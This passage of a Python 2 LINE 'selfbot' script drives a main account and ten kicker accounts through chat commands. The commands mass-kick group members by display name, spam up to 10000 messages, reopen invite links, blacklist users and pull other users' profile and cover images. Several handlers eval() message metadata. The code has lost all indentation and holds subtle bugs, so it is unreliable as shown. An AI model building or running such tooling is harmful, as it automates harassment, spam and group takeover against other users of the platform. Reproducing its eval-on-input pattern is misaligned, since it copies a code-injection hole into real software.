ki8.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki8.sendText(msg.to,"คิกเกอร์ 8\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject9","คิก9 ลบรัน"]:
gid = ki9.getGroupIdsInvited()
for i in gid:
ki9.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki9.sendText(msg.to,"คิกเกอร์ 9\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject10","คิก10 ลบรัน"]:
gid = ki10.getGroupIdsInvited()
for i in gid:
ki10.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki10.sendText(msg.to,"คิกเกอร์ 10\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Y1 rgroups","Y1 rgroup"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"Bot All invitations is clean")
else:
ki1.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Add:on","เปิด เพิ่มเพื่อน","Auto add:on","Add on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ok Bosqu")
else:
cl.sendText(msg.to,"Sudah on Bosqu")
elif msg.text in ["Add:off","Auto add off","ปิด เพิ่มเพื่อน","Add off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ok Bosqu")
else:
cl.sendText(msg.to,"Sudah off Bosqu")
elif msg.text in ["ลบแชต"]:
cl.removeAllMessages(op.param2)
cl.sendText(msg.to,"ทำการลบเรียบร้อย👌")
cl.sendText(msg.to,"Ok")
# elif "รัน @" in msg.text:
# _name = msg.text.replace("รัน @","")
# _nametarget = _name.rstrip(' ')
# gs = cl.getGroup(msg.to)
# for g in gs.members:
# if _nametarget == g.displayName:
# cl.sendText(msg.to,"เริ่มทำการรัน")
# cl.sendText(g.mid,"[☬Ŧ€ΆM฿❂Ŧ↔Pђãỳãƒir€☬]\n[By.☬ARIFISTIFIK☬]\n http://line.me/ti/p/arif.mh")
# cl.sendText(msg.to, "ทำการรันเรียบร้อย")
# print "Done spam"
#========================================
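# "ออน" (uptime): reports how long the bot has been running, using the global
# start timestamp `mulai` and the waktu() duration formatter defined elsewhere.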
elif msg.text.lower() == 'ออน':
cl.sendText(msg.to, "โปรดรอสักครู่....")
eltime = time.time() - mulai
van = "[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\nระยะเวลาที่บอททำงาน\n"+waktu(eltime)
cl.sendText(msg.to,van)
#========================================
elif "Message set:" in msg.text:
wait["message"] = msg.text.replace("Message set:","")
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message: " in msg.text:
wait["message"] = msg.text.replace("Add message: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Message","Com"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Coms set:" in msg.text:
c = msg.text.replace("คอมเม้น:","Coms set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment: " in msg.text:
c = msg.text.replace("Add comment: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["เปิด คอมเม้น","Com on","Comment:on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["ปิด คอมเม้น","Com off","Comment:off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Comment","Coms"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["HHX1","Hhx1"]:
cl.sendText(msg.to,"[เช็คข้อความต้อนรับของคุณ]\n\n" + str(wait["acomment"]))
elif msg.text in ["HHX2","Hhx2"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนออกจากกลุ่ม]\n\n" + str(wait["bcomment"]))
elif msg.text in ["HHX3","Hhx3"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนลบสมาชิก]\n\n" + str(wait["ccomment"]))
elif "Hhx1:" in msg.text:
c = msg.text.replace("Hhx1:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["acomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความต้อนรับ👌\n\n" + c)
elif "Hhx2:" in msg.text:
c = msg.text.replace("Hhx2:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["bcomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนออกจากกลุ่ม👌\n\n" + c)
elif "Hhx3:" in msg.text:
c = msg.text.replace("Hhx3:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["ccomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนลบสมาชิก👌\n\n" + c)
elif msg.text in ["Hhx1 on"]:
if wait["acommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["acommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx2 on"]:
if wait["bcommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["bcommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx3 on"]:
if wait["ccommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["ccommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx1 off"]:
if wait["acommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["acommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Hhx2 off"]:
if wait["bcommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["bcommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Hhx3 off"]:
if wait["ccommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["ccommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Gurl"]:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
elif "Ambil QR: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Ambil QR: ","")
gurl = cl.reissueGroupTicket(gid)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
cl.sendText(msg.to,"Not for use less than group")
elif "Y1 gurl: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Y1 gurl: ","")
x = ki1.getGroup(gid)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki1.updateGroup(x)
gurl = ki1.reissueGroupTicket(gid)
ki1.sendText(msg.to,"line://ti/g/" + gurl)
else:
ki1.sendText(msg.to,"Not for use less than group")
elif "Y2 gurl: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Y2 gurl: ","")
x = ki2.getGroup(gid)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki2.updateGroup(x)
gurl = ki2.reissueGroupTicket(gid)
ki2.sendText(msg.to,"line://ti/g/" + gurl)
else:
ki2.sendText(msg.to,"Not for use less than group")
#========================================
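# Comment blacklist helpers: these set one-shot flags (wblack/dblack) that are
# presumably consumed by a contact-message handler elsewhere to add or remove
# the sent contact from wait["commentBlack"].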
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["เปิด นาฬิกา","Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"༺%H:%M༻")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["ปิด นาฬิกา","Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "ตั้งชื่อ: " in msg.text:
n = msg.text.replace("ตั้งชื่อ: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"༺%H:%M༻")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
elif "/ " in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'id'
kata = msg.text.replace("/ ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
path = "http://chart.apis.google.com/chart?chs=480x80&cht=p3&chtt=" + result + "&chts=FFFFFF,70&chf=bg,s,000000"
urllib.urlretrieve(path, "steal.png")
tts = gTTS(text=result, lang='id')
tts.save('tts.mp3')
cl.sendImage(msg.to,"steal.png")
cl.sendText(msg.to,"DITAMPILKAN UNTUK TEXT\n" + "" + kata + "\n「SUKSES」")
cl.sendAudio(msg.to,'tts.mp3')
#========================================
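# Profile lookups by @display-name: the handlers below resolve a mention to a
# mid by scanning group.members, then fetch the profile picture (pictureStatus)
# or the cover image (via cl.channel.getCover) and send it back.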
elif "/ปก @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("/ปก @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Hack2mid:" in msg.text:
umid = msg.text.replace("Hack2mid:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithUrl(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "/รูป" in msg.text:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("/รูป","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Gak da orange")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithUrl(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
elif msg.text in ["Sp","sp","Speed"]:
cl.sendText(msg.to, "Progress.......")
start = time.time()
time.sleep(0.001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Bot Speed"]:
ki1.sendText(msg.to, "Progress.......")
start = time.time()
time.sleep(0.001)
elapsed_time = time.time() - start
ki1.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
ki6.sendText(msg.to, "%sseconds" % (elapsed_time))
ki7.sendText(msg.to, "%sseconds" % (elapsed_time))
ki8.sendText(msg.to, "%sseconds" % (elapsed_time))
ki9.sendText(msg.to, "%sseconds" % (elapsed_time))
ki10.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Keybot"]:
ki1.sendText(msg.to, "[SELFBOT\nBy.☬ARIFISTIFIK☬]\n\n❂͜͡☆➣ Namelock on\n❂͜͡☆➣ Namelock off\n❂͜͡☆➣ Blockinvite on\n❂͜͡☆➣ Blockinvite off\n❂͜͡☆➣ Backup on\n❂͜͡☆➣ Backup off\n\n[By.☬ARIFISTIFIK☬]")
#========================================
elif msg.text in ["กลับร่าง","Mebb"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
#=================================================
elif msg.text == "#mid on":
cl.sendText(msg.to, "Done..")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "#mid off":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "%s\n\n%s\nReadig point creation:\n [%s]\n" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Lurking dulu dudul Baru bilang result Point.")
#========================================
#-------------------Fungsi spam finish----------------------------
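# "รูปกลุ่ม" sends the current group's icon (admins only); "#Turn off bots"
# lets the super admin (admsa) stop the whole process via sys.exit().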
elif "รูปกลุ่ม" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithUrl(msg.to,path)
elif "#Turn off bots" in msg.text:
if msg.from_ in admsa:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------
elif msg.text in ["ลิ้ง","url"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"[SELF BOT]\n[By.☬ARIFISTIFIK☬]\nline://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifedbot on","เปิดเเจ้งเตือนบอท","Mbot on"]:
if msg.from_ in admin:
if wait["Notifedbot"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed On\n\nเปิดเเจ้งเเตือนบอทเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนบอทเเล้ว")
else:
wait["Notifedbot"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed On\n\nเปิดเเจ้งเเตือนบอทเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนบอทเเล้ว")
elif msg.text in ["Notifedbot off","ปิดแจ้งเตือนบอท","Mbot off"]:
if msg.from_ in admin:
if wait["Notifedbot"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed Off\n\nปิดเเจ้งเเตือนบอทเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนบอทเเล้ว")
else:
wait["Notifedbot"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed Off\n\nปิดเเจ้งเเตือนบอทเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนบอทเเล้ว")
#=================================================
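# "Spam on <n> <text>" sends <text> n times as separate messages;
# "Spam off <n> <text>" sends one message containing n repeated lines.
# Both are capped at 10000 repetitions.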
elif "Spam " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Mid @" in msg.text:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif msg.text in ["เปิดหมด","Phet All on","Phet all on"]:
cl.sendText(msg.to,"[SELF BOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to,"Please wait......")
cl.sendText(msg.to,"Turn on all protection")
cl.sendText(msg.to,"Qr:on")
cl.sendText(msg.to,"Backup:on")
cl.sendText(msg.to,"Read:on")
cl.sendText(msg.to,"Respon:on")
cl.sendText(msg.to,"Responkick:on")
cl.sendText(msg.to,"Protect:on")
cl.sendText(msg.to,"Namelock:on")
cl.sendText(msg.to,"Blockinvite:on")
elif msg.text in ["ปิดหมด","Phet All off","Phet all off"]:
cl.sendText(msg.to,"[SELFBOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to,"Please wait......")
cl.sendText(msg.to,"Turn off all protection")
cl.sendText(msg.to,"Qr:off")
cl.sendText(msg.to,"Backup:off")
cl.sendText(msg.to,"Read:off")
cl.sendText(msg.to,"Respon:off")
cl.sendText(msg.to,"Responkick:off")
cl.sendText(msg.to,"Protect:off")
cl.sendText(msg.to,"Namelock:off")
cl.sendText(msg.to,"Blockinvite:off")
cl.sendText(msg.to,"Link off")
elif msg.text in ["ทีมงาน"]:
msg.contentType = 13
cl.sendText(msg.to, "[TEAM SELFBOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to, "ผู้สร้าง.. SELFBOT\nBy.🔯ARIFISTIFIK🔯")
msg.contentMetadata = {'mid': 'u65224f4e8812136f01b25275a54b5aef'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ผู้จัดการ .SELFBOT\nBy.☬ARIFISTIFIK☬")
msg.contentMetadata = {'mid': 'u6c8aab6ee167a596be2cf045ee2f90df'}
cl.sendMessage(msg)
cl.sendText(msg.to, "หวานใจ\nBy.ผู้สร้างพญาไฟ")
msg.contentMetadata = {'mid': 'u2743230861d1c637647d9ca2a8c1fc14'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ประธาน:")
msg.contentMetadata = {'mid': 'u5b671f4148aa5bbec186b5b7cb295271'}
cl.sendMessage(msg)
cl.sendText(msg.to, "รองประธาน:💫 By. พยัค")
msg.contentMetadata = {'mid': 'u7988143c47d3faacf1856a72011eea93'}
cl.sendMessage(msg)
cl.sendText(msg.to, "รปภ.:SELFBOT")
msg.contentMetadata = {'mid': 'u5b671f4148aa5bbec186b5b7cb295271'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ตัวเเทนสมาชิก:By.บอล")
msg.contentMetadata = {'mid': 'ueabd832a84add1392a2ff758f97b3c8e'}
cl.sendMessage(msg)
#========================================
elif "#คท" in msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to+"',"}
cl.sendMessage(msg)
elif "บิน" in msg.text:
if msg.toType == 2:
print "Kickall ok"
_name = msg.text.replace("บิน","")
# one group fetch is enough; the original fetched the same group ten times (ki1..ki10)
gs = ki10.getGroup(msg.to)
ki1.sendText(msg.to, "Hello all...😁😁")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
# ki1.sendText(msg.to,"Not found.")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki1,ki2,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
# ki3.sendText(msg,to,"Nuke Finish")
# ki2.sendText(msg,to,"
elif msg.text in ["Kill"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Fuck You")
return
for jj in matched_list:
try:
klist=[ki1,ki2,ki10]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("PK4 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki6.kickoutFromGroup(msg.to,[target])
except:
ki6.sendText(msg.to,"Error")
elif "KK2 " in msg.text:
nk0 = msg.text.replace("KK2 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki2.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
elif "KK1 " in msg.text:
nk0 = msg.text.replace("KK1 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki1.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki1.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
#-----------------------------------------------------------
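# "contactjoin:<mid>": abuses the channel's album-creation endpoint
# (createAlbumF) with a random album name. The PK* handlers below kick every
# member mentioned in the message, each routed through a different kicker.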
elif "contactjoin:" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
amid = msg.text.replace("contactjoin:","")
cl.sendText(msg.to,str(cl.channel.createAlbumF(msg.to,name,amid)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif ("PK2 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
except:
ki2.sendText(msg.to,"Error")
elif ("PK3 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
ki5.sendText(msg.to,"Error")
elif ("PK " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "สั่งดำ @" in msg.text:
_name = msg.text.replace("Blacklist @","")
_kicktarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sendText(msg.to,"error")
elif "แบน @" in msg.text:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("แบน @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
